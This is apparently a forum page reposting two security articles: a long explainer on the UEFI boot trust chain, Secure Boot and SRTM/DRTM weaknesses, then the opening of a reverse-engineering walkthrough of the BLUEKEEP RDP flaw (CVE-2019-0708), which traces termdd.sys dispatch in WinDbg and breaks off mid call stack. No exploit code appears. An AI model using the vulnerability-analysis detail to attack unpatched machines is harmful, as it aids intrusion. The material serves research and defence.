ACM. A machine that has a dTPM and doesn't rely on the CSME-implemented iTPM for measurement, could still potentially detect this compromise via attestation. Not so when the iTPM is used (as the attacker controlling CSME potentially controls the iTPM as well). Boot Guard (Measured + Verified Boot), IBB, OBB are Intel terms. In respect of AMD, their HVB (Hardware Validated Boot) covers the boot flow in a similar fashion to Intel's Boot Guard. The main difference seems to be that the Root-of-Trust is rooted in the Platform Security Processor (PSP) which fills both the role of Intel's CSME and the ACM. The processor itself is ARM-Cortex-based and sits on the CPU die itself (and not in the PCH as in Intel's case). The PSP firmware is still delivered on the flash; it has it's own BL - bootloader which is verified from the PSP on-die ROM, analogous to CSME's Bringup stage. The PSP will then verify the initial UEFI code before releasing the host CPU from reset. AMD also don't speak about IBB/OBB, rather they talk about 'segments', each responsible for verifying the next segment. SEC Ok, ok we're at Genesis for real now! But wait (again)! What's this IBB (Initial Boot Block) thing? Wasn't the SEC phase the start of it all (sans the actual start of it all, as above). All these terms aren't confusing enough. At all. I purposely didn't open at the top with a 'top down' view the boot verification flow - instead opting to explain organically as we move forward. We have, however, discussed the initial stage of Verified Boot. We now understand how trust is established in this IBB block (or first segment). We can quickly recap the general Verified Boot flow: In short, as we have already established, the ACM (which is Intel's code), verifies the IBB (OEM code). The IBB as CDI will be responsible for verifying the OBB (OEM Boot Block) UDI to transform it into a CDI. The OBB then verifies the next code to run (which is usually the boot manager or other optional 3rd part EFI images) - as part of UEFI Secure Boot. So in terms of verification (with the help of CSME): uCode->ACM->IBB->OBB->whatevers-next Generally, the IBB encapsulates the SEC + Pre-EFI Initialization (PEI) phases - the PEI FV (Firmware Volume). (The SEC phase named as such but having relatively little to do with actual 'security'.) With no Verified Boot the CPU will start executing the SEC phase from the legacy reset vector (0xfffffff0); directly off the SPI flash (the hardware has the necessary IP to implement a transparent memory-mapped SPI interface to the flash. At the reset vector, the platform can execute only in a constrained state. For example, it has no concept of crucial components such as RAM. Kind of an issue if we want to execute meaningful higher-level code. It is also in Real Mode. As such, one of the first jobs of SEC is switch the processor to Protected Mode (because legacy modes aren't the funnest). It will also configure the memory available in the CPU caches into a CAR (Cache-as-RAM) 'no-eviction mode' - via MTRRs. This mode will ensure that and reads/writes to the CPU caches do not land up in an attempt to evict them to primary memory external to the chip. The constraint created here is that the available memory is limited to that available in the CPU caches, but this is usually quite large nowadays; the recent Ryzen 3900x chip that I acquired has a total of 70Mb; more than sufficient for holding the entire firmware image in memory + extra for execution environment usages (data regions, heaps + stacks); not that this is actually done. Another important function of SEC is to perform the initial handling of the various sleep states that the machine could have resumed from and direct to alternate boot paths accordingly. This is absolutely out of scope for our discussion (super complex) - as is anything to do with ACPI; it's enough to know that it happens (and has a measurable impact on platform security + attack surface). And because we want to justify the 'SEC' phase naming, uCode updates can be applied here. When executing the SEC from a Verified Boot flow (i.e. after ACM verification of the IBB), it seems to me that the CPU caches must already have been set up as CAR (perhaps by the ACM?); in an ideal world the entire IBB should already be cache-memory resident (if it was read directly off the flash after passing verification, we'd potentially have a physical attack TOCTOU security issue on our hands). I'd hope that the same is true on the AMD side. After SEC is complete, platform initialization continues with the Pre-EFI Initialization phase (PEI). Each phase requires a hand-off to the next phase which includes a set of structured information necessary for the subsequent phase to do its job. In the case of the SEC, this information includes necessary vectors detailing where the CAR is located, where the BFV (Boot Firmware Volume) can be found mapped into a processor-accessible memory region and some other bits and bobs. PEI PEI is comprised of the PEI Foundation - a binary that has no code dependencies, and a set of Pre-EFI Initialization Modules (PEIMs). The PEI Foundation (PeiCore) is responsible for making sure PEIMs can communicate with each other (via the PPI - PEIM-to-PEIM Interface) and a small runtime environment providing number of further services (exposed via the PEI Services Table) to those PEIMs. It also dispatches (invokes/executes) the PEIMs themselves. The PEIMs are responsible for all aspects of base-hardware initialization, such as primary memory configuration (such that main RAM becomes available), CPU + IO initialization, system bus + platform setup and the init of various other features core to the functioning of a modern computing platform (such as the all-important BIOS status code). Some of the code running here is decidedly non-trivial (for example, I've seen a USB stack) and I've observed that there are more PEIMs than one would reasonably think there should be; on my MSI X570 platform I count ~110 modules! I'd like to briefly call out the PEIM responsible for main memory discovery and initialization. When it returns to the PEI Foundation, it provides information about the newly-available primary system memory. The PEI Foundation must now switch from the 'temporary' CAR memory to the main system memory. This must be done with care (from a security perspective). PEIMs can also choose to populate sequential data structures called HOBs (Hand-Off Blocks) which include information that may be necessary to consuming code further down the boot stack (e.g. in phases post-PEI). These HOBs must be resident in main system memory. Before we progress to the next phase, I'd like to return to our topic of trust. Theoretically, the PEI Foundation is expected to dispatch a verification check before executing any PEIM. The framework itself has no notion of how to establish trust, so it should delegate this to a set of PPIs (potentially serviced by other PEIMs). There is a chicken-and-egg issue here: if some component of the PEI phase should be responsible for establishing trust, what establishes trust in that component? This is all meaningless unless the PEI itself (or a subsection of it) is trusted. As a reminder, though, we know that the IBB - which encapsulates the SEC+PEI (hopefully unless the OEM has messed this up) is verified and is trusted (CDI) when running under Verified Boot, therefore the PEI doesn't necessarily need to perform its own integrity checks on various PEIMs; or does it? Here you can see the haze that becomes a source of confusion for OEMs implementing security around this - with all the good will in the world. If the IBB is memory resident and has been verified by the ACM and is untouched since verification, a shortcut can be taken and the PEI verifying PEIMs seems superfluous. If, however, PEIMs are loaded from flash as and when they're needed, they need to be verified before execution and that verification needs to be rooted in the TCB already established by the ACM (i.e. the initial code that it verified as the IBB). If PEI code is XIP (eXecuted In Place), things are even worse and physical TOCTOU attacks become a sad reality. Without a TCB established via a verified boot mechanism the PEI is self-trusted and becomes the Root-of-Trust. This is referred to as the CRTM - the Core Root of Trust for Measurement (the importance of which will become apparent when we eventually speak about Secure Boot). The PEI is measured into the TPM in PCR0 and can be attested to later on, but without a previously-established TCB, any old Joe can just replace the thing; remotely if the OEM has messed up the secure firmware update procedure or left the SPI flash writable. Oy. Our flow is now almost ready to exit the PEI phase with the platform set up and have some 'full-fledged' code! Next up is the DXE (Driver eXecution Environment) phase. Before entering DXE, PEI must perform two important tasks. The first is to verify the DXE. In our Intel parlance, PEI (or at least the part of it responsible for trust) was part of the IBB that was verified by the Boot Guard ACM. Intel's Boot Guard / AMDs HVB code has already exited the picture once the IBB (Intel)/1st segment (AMD) starts executing and the OEM is expected to take over the security flow from here (eh). PEI must therefore have some component to verify and measure the OBB/next phase (of which DXE is a part). On platforms that support Boot Guard, a PEIM (may be named BootGuardPei in your firmware) is responsible for doing this work. This PEIM registers a callback procedure to be called when the PEI phase is ready to exit. When it is called, it is expected to bring the OBB resident and verify it. The same discussion applies to the DXE as did to the PEI above regarding verification of various DXE modules (we'll discuss what these are shortly). If the entire OBB is brought resident and verified by this PEIM, the OEM may decide to shortcut verification of each DXE module. Alternatively a part of DXE can be made CDI and that can be used to verify each module prior to execution (bringing with it all the security considerations already mentioned). Either way; yet another part of the flow where the OEM can mess things up. The second, and final, task of the PEI is to setup and execute the DXE environment. Anyhoo, let's get right to DXE. DXE Similar to PEI, DXE consists of a DXE Foundation - the DXE Core + DXE driver dispatcher (DxeCore) and a number DXE drivers. We can go down an entire rabbit hole around what's available to, and exposed by, the DXE phase; yet another huge collection of code (this time I count ~240 modules on in my firmware). But as we're not writing a book, I'll leave it up to whoever's interested to delve further as homework. The DXE Foundation has access to the various PEIM-populated HOBs. These HOBs include all the information necessary to have the entire DXE phase function independently of what has come before it. Therefore, nothing (other than the HOB list) has to persist once DXE Core is up and running and DXE can happily blast over whatever is left of PEI in memory. The DXE Dispatcher will discover and execute the DXE drivers available in the relevant firmware volume. These drivers are responsible for higher-level platform initialization and services. Some examples include the setting up of System Management Mode (SMM), higher-level firmware drivers such as network, boot disks, thermal management, etc. Similar to what the PEI Framework does for PEIMs, the DXE Framework exposes a number of services to DXE drivers (via the DXE Services Table). These drivers are able to register (and lookup+consume) various architectural protocols covering higher-level constructs such as storage, security, RTC, etc. DXE Core is also responsible for populating the EFI System Table which includes pointers to the EFI Boot Services Table, EFI Runtime Services Table and EFI Configuration Table. The EFI Configuration Table contains a set of GUID/pointer pairs that correspond to various vendor tables identified by their GUIDs. It's not really necessary to delve into these for the purposes of our discussion: typedef struct { /// /// The 128-bit GUID value that uniquely identifies the system configuration table. /// EFI_GUID VendorGuid; /// /// A pointer to the table associated with VendorGuid. /// VOID *VendorTable; } EFI_CONFIGURATION_TABLE; The EFI Runtime Services Table contains a number of services that are invokable for the duration of system runtime: typedef struct { /// /// The table header for the EFI Runtime Services Table. /// EFI_TABLE_HEADER Hdr; // // Time Services // EFI_GET_TIME GetTime; EFI_SET_TIME SetTime; EFI_GET_WAKEUP_TIME GetWakeupTime; EFI_SET_WAKEUP_TIME SetWakeupTime; // // Virtual Memory Services // EFI_SET_VIRTUAL_ADDRESS_MAP SetVirtualAddressMap; EFI_CONVERT_POINTER ConvertPointer; // // Variable Services // EFI_GET_VARIABLE GetVariable; EFI_GET_NEXT_VARIABLE_NAME GetNextVariableName; EFI_SET_VARIABLE SetVariable; // // Miscellaneous Services // EFI_GET_NEXT_HIGH_MONO_COUNT GetNextHighMonotonicCount; EFI_RESET_SYSTEM ResetSystem; // // UEFI 2.0 Capsule Services // EFI_UPDATE_CAPSULE UpdateCapsule; EFI_QUERY_CAPSULE_CAPABILITIES QueryCapsuleCapabilities; // // Miscellaneous UEFI 2.0 Service // EFI_QUERY_VARIABLE_INFO QueryVariableInfo; } EFI_RUNTIME_SERVICES; These runtime services are utilized by the OS to perm UEFI-level tasks. Some of the functionality provided by vectors available in the table above are mostly self-explanatory, e.g. the variable services are used to read/write EFI variables - usually stored on in NV (non-volatile) memory - i.e. on the flash. (The Windows Boot Configuration Data (BCD) makes use of this interface for storing variable boot-time settings, for example) The EFI Boot Services Table contains a number of services that are invokable by EFI applications until such time as ExitBootServices() - itself an entry in this table - is called: typedef struct { /// /// The table header for the EFI Boot Services Table. /// EFI_TABLE_HEADER Hdr; // // Task Priority Services // EFI_RAISE_TPL RaiseTPL; EFI_RESTORE_TPL RestoreTPL; // // Memory Services // EFI_ALLOCATE_PAGES AllocatePages; EFI_FREE_PAGES FreePages; EFI_GET_MEMORY_MAP GetMemoryMap; EFI_ALLOCATE_POOL AllocatePool; EFI_FREE_POOL FreePool; // // Event & Timer Services // EFI_CREATE_EVENT CreateEvent; EFI_SET_TIMER SetTimer; EFI_WAIT_FOR_EVENT WaitForEvent; EFI_SIGNAL_EVENT SignalEvent; EFI_CLOSE_EVENT CloseEvent; EFI_CHECK_EVENT CheckEvent; // // Protocol Handler Services // EFI_INSTALL_PROTOCOL_INTERFACE InstallProtocolInterface; EFI_REINSTALL_PROTOCOL_INTERFACE ReinstallProtocolInterface; EFI_UNINSTALL_PROTOCOL_INTERFACE UninstallProtocolInterface; EFI_HANDLE_PROTOCOL HandleProtocol; VOID *Reserved; EFI_REGISTER_PROTOCOL_NOTIFY RegisterProtocolNotify; EFI_LOCATE_HANDLE LocateHandle; EFI_LOCATE_DEVICE_PATH LocateDevicePath; EFI_INSTALL_CONFIGURATION_TABLE InstallConfigurationTable; // // Image Services // EFI_IMAGE_LOAD LoadImage; EFI_IMAGE_START StartImage; EFI_EXIT Exit; EFI_IMAGE_UNLOAD UnloadImage; EFI_EXIT_BOOT_SERVICES ExitBootServices; // // Miscellaneous Services // EFI_GET_NEXT_MONOTONIC_COUNT GetNextMonotonicCount; EFI_STALL Stall; EFI_SET_WATCHDOG_TIMER SetWatchdogTimer; // // DriverSupport Services // EFI_CONNECT_CONTROLLER ConnectController; EFI_DISCONNECT_CONTROLLER DisconnectController; // // Open and Close Protocol Services // EFI_OPEN_PROTOCOL OpenProtocol; EFI_CLOSE_PROTOCOL CloseProtocol; EFI_OPEN_PROTOCOL_INFORMATION OpenProtocolInformation; // // Library Services // EFI_PROTOCOLS_PER_HANDLE ProtocolsPerHandle; EFI_LOCATE_HANDLE_BUFFER LocateHandleBuffer; EFI_LOCATE_PROTOCOL LocateProtocol; EFI_INSTALL_MULTIPLE_PROTOCOL_INTERFACES InstallMultipleProtocolInterfaces; EFI_UNINSTALL_MULTIPLE_PROTOCOL_INTERFACES UninstallMultipleProtocolInterfaces; // // 32-bit CRC Services // EFI_CALCULATE_CRC32 CalculateCrc32; // // Miscellaneous Services // EFI_COPY_MEM CopyMem; EFI_SET_MEM SetMem; EFI_CREATE_EVENT_EX CreateEventEx; } EFI_BOOT_SERVICES; These services are crucial for getting any OS boot loader up and running. Trying to stick to the format of explaining the boot process via the security flow, we now need to speak about Secure Boot. As 'Secure Boot' is often pandered around as the be-all and end-all of boot-time security, if you take anything away from reading this, please let is be an understanding that Secure Boot is not all that is necessary for trusted platform execution. It plays a crucial role but should not be seen as a technology that can be considered robust in a security sense without other addendum technologies (such as Measured+Verified Boot). Simply put, Secure Boot is this: Prior to execution of any EFI application, if Secure Boot is enabled, the relevant Secure Boot-implementing DXE driver (SecureBootDXE on my machine) must verify the executable image before launching that application. This requires a number of cryptographic keys: PK - Platform Key: The platform 'owner' (alas usually the OEM) issues a key which is written into a secure EFI variable (these variable are only updatable if the update is attempted by an entity that can prove its ownership over the variable. We won't discuss how this works here; just know: the security around this can be meh). This key must only by used to verify the KEK KEK - Key Exchange Key: One or more keys that are signed by the PK - used to update the current signature databases dbx - Forbidden Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are blacklisted (i.e. forbidden from executing). The database is signed by the KEK db - Signature Database: Database of entries (keys, signatures or hashes) that identify EFI executables that are whitelisted. The database is signed by the KEK [Secure firmware update key: Outside the scope of this discussion] For example, prior to executing any OEM-provided EFI applications or the Windows Boot Manager, the DXE code responsible for Secure Boot must first check that the EFI image either appears verbatim in the db or is signed with a key present in the db. Commercial machines often come with a OEM-provisioned PK and Microsoft's KEK and CA already present in the db (much debate over how fair this is). Important note: Secure Boot is not designed to defend against an attacker with physical access to a machine (keys are, by design, replaceable). BDS The DXE phase doesn't perform a formal hand-off to the next phase in the UEFI boot process, the BDS (Boot Device Selection) phase; rather DXE is still resident and providing both EFI Boot and EFI Runtime services to the BDS (via the tables described above). What happens from here can be slightly different depending on what it is that we're booting (if we're running some simple EFI application as our end goal - we are basically done already). So let's carry on our discussion in terms of Microsoft Windows. As mentioned, when all the necessary DXE drivers have been executed, and the system is now ready to boot an operating system, the DXE code will attempt to launch a boot application. Boot menu entries are specified in EFI variables and EFI boot binaries are usually resident on the relevant EFI system partition. In order to discover + use the system partition, DXE must already (a) have a FAT driver loaded such that it can make sense of the file system (which is FAT-based) and (b) parse the GUID Partition Table (GPT) to discover where the system partition is on disk. The first Windows-related code to run (ignoring any Microsoft-provided PEIMs or DXE drivers is the Windows Boot Manager (bootmgrfw.efi). The Windows Boot Manager is the initial boot loader required to get Windows running. It uses the EFI Boot-time Service-provided block IO protocol to transact with the disk (such that it doesn't need to mess around with working out how to communicate with the hardware itself). Mainly, it's responsible for selecting the configured Windows boot loader and invoking it (but it does some other stuff like setting up security policies, checking if resuming from hibernation or recovery boot is needed, etc.). TSL Directly after BDS is done, we've got the TSL (Transient System Load) phase; a fancy way of describing the phase where the boot loader actually brings up the operating system and tears down the unnecessary parts of DXE. In the Windows world, the Windows Boot Manager will now launch the Windows Boot Loader (winload.efi) - after performing the necessary verification (if Secure Boot is enabled). The Windows Boot Loader is a heftier beast and is performs some interesting work. In the simplest - not-caring-about-anything-security-related - flow, winload.efi is responsible for initializing the execution environment such that the kernel can execute. This includes enabling paging and setting up the Kernel's page tables, dispatch tables, stacks, etc. It also loads the SYSTEM registry hive (read-only, I believe) and the kernel module itself - ntoskrnl.exe (and once-upon-a-time hal.dll as well). Just before passing control to the NT kernel, winload will call ExitBootServices() to tear down the boot-time services still exposed from DXE (leaving just the runtime services available). SetVirtualAddressMap to virtualize the firmware services (i.e. informing the DXE boot-time service handler of the relevant virtual address mappings). Carrying on with our theme of attempting to understand how trusted computing is enabled (now with Windows as the focus), on a machine with Secure Boot enabled, winload will of course only agree to load any images after first ensuring they pass verification policy (and measuring the respective images into the TPM, as necessary). I'd encourage all Windows 10 users to enable 'Core Isolation' (available in the system Settings). This will enable HVCI (Hypervisor-enforced Kernel-mode code integrity) on the system; in turn meaning that the Microsoft HyperV hypervisor platform will run, such that VBS (Virtualization-based Security) features enabled by VSM (Virtual Secure Mode) will be available. In this scenario winload is responsible for bringing up the hypervisor, securekernel, etc. but diving into that requires a separate post (and others have done justice to it anyway). RT The kernel will now perform it's own initialization and set up things just right - loading drivers etc; taking us to the stage most people identify as being the 'end of boot'. The only EFI services still available to the OS are the EFI Runtime Services which the OS will invoke as necessary (e.g. when reading/writing UEFI variables, shutdown, etc.). This part of the UEFI life-cycle is termed the RT (RunTime). SRTM/DRTM and rambling thoughts We should now have a rudimentary understanding of the general boot flow. I do want to back up a bit though and again discuss the verified boot flow and where the pitfalls can lie. Hopefully one can see how relatively complex this all is, and ensuring that players get everything correct is often a challenge. Everything that we've discussed until now is part of what we term the SRTM (Static Root-of-Trust for Measurement) flow. This basically means that, from the OS's perspective, all parts of the flow up until it, itself, boots form part of the TCB (Trusted Computing Base). Let's dissect this for a moment. The initial trust is rooted in the CPU+chipset vendor. In Intel's case, we have the CPU ROM and the CSME ROM as joint roots-of-trust. Ok, Intel, AMD et. al. are pretty well versed in security stuff after all - perhaps we're happy to trust they have done their jobs here (history says not; but it is getting better with time and hey, we've got to trust someone). But once the ACM verifies the IBB, we have moved responsibility to OEM vendor code. Now I'll be charitable here and say that often this code is godawful from a security perspective. There is a significant amount of code (just count the PEIMs and DXE drivers) sourced from all over the place and often these folk simply don't have the security expertise to implement things properly. The OEM-owned IBB measures the OEM-owned OBB which measures the OS bootloader. We might trust the OS vendor to also do good work here (again, not fool proof) but we have this black hole of potential security pitfalls for OEM vendors to collapse in to. And if UEFI is compromised, it doesn't matter how good the OS bootloader verification flows are. Basically this thing is only as good as its weakest link; and that, traditionally, has been UEFI. Let's identify some SRTM pitfalls. Starting with the obvious: if the CPU ROM or CSME/PSP ROMs are compromised, everything falls apart (same is of course true with DRTM, described below). I wish I could say that there aren't issues here with specific vendors, but that would be disingenuous. Let us assume for now the CPU folk have gotten their act together. We now land ourselves in the IBB or some segment verified by the ACM/PSP. The first pitfall is that the OEM vendor needs to actually present the correct parts of the firmware for verification by the ACM. Sometimes modules are left out and are just happily executed by the PEI (as they've also short-circuited PEIM verification). Worse, the ACM requires an OEM key to verify the IBB (hence why it needs the CSME in the first place) - some OEMs haven't burned in their key properly or are using test keys are haven't set the EOM (End of Manufacturing) fuse allowing carte blanche attacks against this (and even worse, lack of OEM action here can actually lead to these security features being hijacked to protect malicious code itself). OEMs need to be wary about making sure that when PEI switches over to main system memory a TOCTOU attack isn't opened up by re-reading modules of SPI and assuming they are trusted. Furthermore, for verified boot to work, there needs to be some PEI module responsible for verifying DXE but if the OEM has stuffed up and the IBB isn't verified properly at all, then this module can be tampered with and the flow falls apart. Oh and this OEM code could do the whole verification bit correctly and simply do a 'I'll just execute this code-that-failed verification and ask it to reset the platform because I'll tell it that it, itself, failed verification' (oh yes, this happened). And there are all those complex flows that I haven't spoken about at all - e.g. resuming from sleep states and needing to protect the integrity of saved contexts correctly. Also, just enabling the disparate security features seems beyond some OEMs - even basic ones like 'don't allow arbitrary runtime writes to the flash' are ignored. Getting this correct requires deep knowledge of the space. For example, vendors have traditionally not considered the evil maid attack in scope and TOCTOU attacks have been demonstrated against the verification of both the IBB and OBB. Carrying on though, let's assume that PEI is implemented correctly, what about the DXE module responsible for things down line? Has that been done correctly? Secure Boot has its own complexities, what with its key management and only allowing modification of authenticated UEFI variables by PK owners, etc. etc. I'm not going to go into every aspect of what can go wrong here but honestly we've seen quite a lot of demonstrable issues historically. (To be clear, above I'm speaking about STRM in terms of what ususally goes on in most Windows-based machines today. There are SRTM schemes that do a lot better there - e.g. Google's Titan and Microsoft's Cerberus in which a separate component is interposed between the host/chipset processors + the firmware residing on SPI.) So folk got together and made an attempt to come up with a way to take the UEFI bits out of the TCB. Of course this code still needs to run; but we don't really want to trust it for the purposes of verifying and loading the operating system. So DRTM (Dynamic Root-of-Trust for Measurement) was invented. In essence what this is, is a way to supply potentially multiple pieces of post-UEFI code for verification by the folk that we trust (more than the folk we trust less - i.e. the CPU/chipset vendors (Intel/AMD et al). Instead of just relying on the Secure Boot flow which relies on the OEMs having implemented that properly, we just don't care what UEFI does (it's assumed compromised in the model). Just prior to executing the OS, we execute another ACM via special SENTER/SKINIT instructions (rooted in the CPU Root-of-Trust just like we had with Boot Guard verifying the IBB). This time we ask this ACM to measure a piece of OS-vendor (or other vendor) code called an MLE (Measured Launch Environment) - all measurements extended into PCRs of the TPM of course such that we can attest to them later on. This MLE - after verification by the ACM - is now trusted and can measure the various OS components etc. - bypassing trust in EFI. Now here's my concern: I've heard folk get really excited about DRTM - and rightly so; it's a step forward in terms of security. However I'd like to speak about some potential issues with the 'DRTM solves all' approach. My main concern is that we stop understanding that compromised UEFI can still possibly be damaging to practical security - even in a DRTM-enabled world. SMM is still an area of concern (although there are incoming architectural features that will help address this). But even disregarding SMM, the general purpose operating systems that most of the world's clients + servers run on were designed in a era before our security field matured. Security has been tacked-on for years with increasing complexity. In a practical sense, even our user-modes still execute code that is privileged in the sense of being able to affect the exact damage on a targeted system that attackers are happy to live with (not to forget that our kernel-modes are pretty permissive as well). Remember, attackers don't care about security boundaries or domains of trust; they just want to do what they need to do. As an example, in recent history an actor known as Sednit/Strontium achieved a high degree of persistence on machines by installing DXE implants on platforms that hadn't correctly secured programmatic write access to the SPI flash. Enabling Secure Boot is ineffectual as it only cares about post-DXE; compromised DXE means compromised Secure Boot. Enabling Measured/Verified Boot could *possibly* have helped in this particular case - if we trust the current UEFI code to do its job - but the confidence of that probably isn't high being that these platform folk didn't even disable write access to the SPI (and we've seen Boot Guard rendered ineffectual via DXE manipulation - something Sednit would have been able to do here). So let us assume that Sednit would have been able to get their DXE modules running even under Verified Boot. Anyway, the firmware implants attacked the system by mounting the primary NTFS partition, writing their malicious code to the drive, messing around with the SYSTEM registry hive to ensure that their service is loaded at early boot and... done! That's all that's necessary to compromise a system such that it can persist over an FnR (Format and Restore). (BitLocker can also help defend against this particular type of attack in an SRTM flow; but that's assuming that it's enabled in the first place - and the CRTM is doing its job - and it's not configured in an auto unlock mode). Let's take this scenario into a DRTM world. UEFI 'Secure Boot' compromise becomes somewhat irrelevant with DRTM - the MLE can do the OS verification flow; so that's great. An attacker can no longer unmeasurably modify the OS boot manager, boot loader, kernel (code regions, at least), securekernel, hv with impunity. These are all very good things. But here's the thing: UEFI is untrusted in the DRTM model, so in the threat model we assume that the attacker would be able to run their DXE code - like today. They can do that very same NTFS-write to get their user-mode service on to NTFS volume. Under a default Windows setup - sans a special application control / device guard policy, Windows will happily execute that attacker service (code-signing is completely ineffectual here - that's a totally broken model for Windows user-mode applications). Honestly though, a machine that enabled a DRTM flow would hopefully enable Bitlocker which should be more effectual here as I'd expect that the DRTM measurements are required before unsealing the Bitlocker decryption key (I'm not exactly sure of the implementation details around this), but I wonder to what extent compromised UEFI could mess around with this flow; perhaps by extending the PCRs itself with the values expected from DRTM measurements, unsealing the key, writing its stuff to the drive, reboot? Or, more complexly, launching it's own hypervisor to execute the rest of the Windows boot flow under (perhaps trapping SENTER/SINIT, et. al.??). I'd need to give some thought as to what's possible here, but given the complexity surrounding all this it's not out of the realm of possibility that compromised UEFI can still be damaging. Now, honestly, in terms of something Sednit-like writing an executable to disk, a more restrictive (e.g. state-separated) platform that is discerning about what user- and kernel-mode code it lets run (and with which privileges) might benefit significantly from DRTM - although it seems likely one can affect huge damage on an endpoint via corrupting settings files alone - no code exec required; something like how we view data-corruption via DKOM, except this time 'DCM' (Direct Configuration Manipulation)?? from firmware. DRTM is *excellent*, I'm just cautioning against assuming that it's an automatic 'fix-all' today for platform security issues. I feel more industry research around this may be needed to empirically verify the bounds of its merits. I hope you enjoyed this 'possibly-a-little-more-than-a-primer' view into UEFI boot and some of the trust model that surrounds it. Some hugely important, related things I haven't spoken about include SMM, OROM and secure firmware updates (e.g. Intel BIOS Guard); topics for another time. Please let me know if you found this useful at all (it did take a non-insignificant amount of time to write). Am always happy to receive constructive feedback too. I'd like to end off with a few links to some offensive research work done by some fantastic folk that I've come across over the years - showing what can be done to compromise this flow (some of which I've briefly mentioned above). If you know of any more resources, please send them my way and I'll happily extend this list: https://conference.hitb.org/hitbsecconf2019ams/materials/D1T1 - Toctou Attacks Against Secure Boot - Trammell Hudson & Peter Bosch.pdf https://github.com/rrbranco/BlackHat2017/blob/master/BlackHat2017-BlackBIOS-v0.13-Published.pdf https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9 https://embedi.org/blog/bypassing-intel-boot-guard/ https://www.blackhat.com/docs/us-17/wednesday/us-17-Matrosov-Betraying-The-BIOS-Where-The-Guardians-Of-The-BIOS-Are-Failing.pdf https://2016.zeronights.ru/wp-content/uploads/2017/03/Intel-BootGuard.pdf Sursa: https://depletionmode.com/uefi-boot.html
    1 point
  11. Low-level Reversing of BLUEKEEP vulnerability (CVE-2019-0708) Home Low-level Reversing of BLUEKEEP vulnerability (CVE-2019-0708) 06 Aug 2019 BY: Latest from CoreLabs This work was originally done on Windows 7 Ultimate SP1 64-bit. The versions of the libraries used in the tutorial are: termdd.sys version 6.1.7601.17514 rdpwsx.dll version 6.1.7601.17828 rdpwd.sys version 6.1.7601.17830 icaapi.dll version 6.1.7600.16385 rdpcorekmts.dll version 6.1.7601.17828 The Svchost.exe process In the Windows NT operating system family, svchost.exe ('Service Host) is a system process that serves or hosts multiple Windows services. It runs on multiple instances, each hosting one or more services. It's indispensable in the execution of so-called shared services processes, where a grouping of services can share processes in order to reduce the use of system resources. The tasklist /svc command on a console with administrator permission shows us the different svchost processes and their associated services. Image 1.png Also in PROCESS EXPLORER you can easily identify which of the SVChosts is the one that handles RDP connections.(Remote Desktop Services) image2019-7-1_8-54-22.png STEP 1) Initial reversing to find the point where the program starts to parse my data decrypted The first thing we'll do is try to see where the driver is called from, for that, once we're debugging the remote kernel with Windbg or IDA, we put a breakpoint in the driver dispatch i.e. in the IcaDispatch function of termdd.sys. image2019-7-1_9-1-57.png In windbg bar I type .reload /f !process 1 0 PROCESS fffffa8006598b30 SessionId: 0 Cid: 0594 Peb: 7fffffd7000 ParentCid: 01d4 DirBase: 108706000 ObjectTable: fffff8a000f119a0 HandleCount: 662. Image: svchost.exe The call stack is WINDBG>k Child-SP RetAddr Call Site fffff880`05c14728 fffff800`02b95b35 termdd!IcaDispatch fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5 fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588 fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306 fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78 fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13 00000000`06d0f6c8 000007fe`f95014b2 ntdll!NtCreateFile+0xa 00000000`06d0f6d0 000007fe`f95013f3 ICAAPI!IcaOpen+0xa6 00000000`06d0f790 000007fe`f7dbd2b6 ICAAPI!IcaOpen+0x13 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x1da 00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9 00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae 00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12 00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd 00000000`06d0f970 00000000`00000000 ntdll!RtlUserThreadStart+0x1d An instance of CKMRDPListener class is created. This thread is created, the start address of the thread is the method CKMRDPListener::staticListenThread image2019-7-1_10-17-43.png the execution continues here image2019-7-1_10-20-52.png here image2019-7-1_10-22-19.png here image2019-7-1_10-23-22.png IcaOpen is called image2019-7-1_10-24-34.png image2019-7-1_14-18-49.png We can see RDX (buffer) and r8d (size of buffer) both are equal to zero in this first call to IcaOpen. Next the driver termdd is opened using the call to ntCreateFile image2019-7-1_9-12-46.png We arrived to IcaDispatch when opening the driver. image2019-7-1_10-30-44.png Reversing we can see image2019-7-1_10-49-54.png image2019-7-1_11-37-10.png The MajorFunction value is read here image2019-7-1_11-40-31.png image2019-7-1_11-41-16.png As MajorFuncion equals 0 it takes us to IcaCreate image2019-7-1_11-43-26.png image2019-7-1_11-45-17.png Inside IcaCreate, SystemBuffer is equal to 0 image2019-7-1_12-51-8.png image2019-7-1_12-49-25.png image2019-7-1_12-52-42.png A chunk of size 0x298 and tag ciST is created, and I call it chunk_CONNECTION. image2019-7-1_13-10-53.png chunk_CONNECTION is stored in FILE_OBJECT.FsContext image2019-7-1_13-14-27.png I rename FsContext to FsContext_chunk_CONNECTION. image2019-7-1_13-16-44.png IcaDispatch is called for second time Child-SP RetAddr Call Site fffff880`05c146a0 fffff880`03c96748 termdd!IcaCreate+0x36 fffff880`05c146f0 fffff800`02b95b35 termdd!IcaDispatch+0x2d4 fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5 fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588 fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306 fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78 fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13 00000000`06d0f618 000007fe`f95014b2 ntdll!NtCreateFile+0xa 00000000`06d0f620 000007fe`f95018c9 ICAAPI!IcaOpen+0xa6 00000000`06d0f6e0 000007fe`f95017e8 